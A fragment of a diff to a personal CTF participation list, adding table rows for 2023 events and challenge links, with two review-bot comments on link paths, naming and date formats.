| Snowpoint | [The Phish Tank - 1](/ICSJWG%20CTF%202023/The%20Phish%20Tank%20-%201/)
|
||||
| Snowpoint | [The Phish Tank - 2](/ICSJWG%20CTF%202023/The%20Phish%20Tank%20-%202/)
|
||||
| Snowpoint | [The Phish Tank - 3a](/ICSJWG%20CTF%202023/The%20Phish%20Tank%20-%203a/)
|
||||
| Snowpoint | [The Phish Tank - 3b](/ICSJWG%20CTF%202023/The%20Phish%20Tank%20-%203b/)
|
|
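Review bot: Every link in the rewritten rows points at a per-challenge directory such as `/ICSJWG%20CTF%202023/The%20Phish%20Tank%20-%203b/`, but no file under `ICSJWG CTF 2023` is added in the visible part of this commit; confirm those twelve directories already exist, or the links will not resolve. The change is also not covered by the commit message, which only mentions adding two writeups, so it would sit better in its own commit.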
@ -44,3 +44,6 @@ List of CTF events that i have joined before
|
|||
| Cyberconférence CTF (24h@CTF '23) | 14 April, 23:00 WIB — 16 April 2023, 21:00 WIB | [Link](/24h%40CTF%202023/) |
|
||||
| Texas Security Awareness Week 2023 | 15 April, 22:00 WIB — 17 April 2023, 05:00 WIB | [Link](/TexSAW%202023/) |
|
||||
| WaniCTF 2023 | 04 May, 13:00 WIB — 06 May 2023, 13:00 WIB | [Link](/WaniCTF%202023/) |
|
||||
| ICSJWG Spring 2023 | 07 May, 01:00 WIB — 12 May 2023, 01:00 WIB | [Link](/ICSJWG%20CTF%202023/) |
|
||||
| DeadSec CTF 2023 | 19 May, 20:00 WIB — 21 May 2023, 20:00 WIB | [Link](/DeadSec%20CTF%202023/) |
|
||||
| BYUCTF 2023 | 20 May, 00:00 WIB — 21 May 2023, 12:00 WIB | [Link](/BYUCTF%202023/) |
|
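Review bot: The row labelled "ICSJWG Spring 2023" links to `/ICSJWG%20CTF%202023/`, so the event is named two different ways in one row; pick one name and use it in both places. The start dates in these rows omit the year ("19 May, 20:00 WIB") while the end dates carry it, which is readable within 2023 but becomes ambiguous for an event that spans a year boundary.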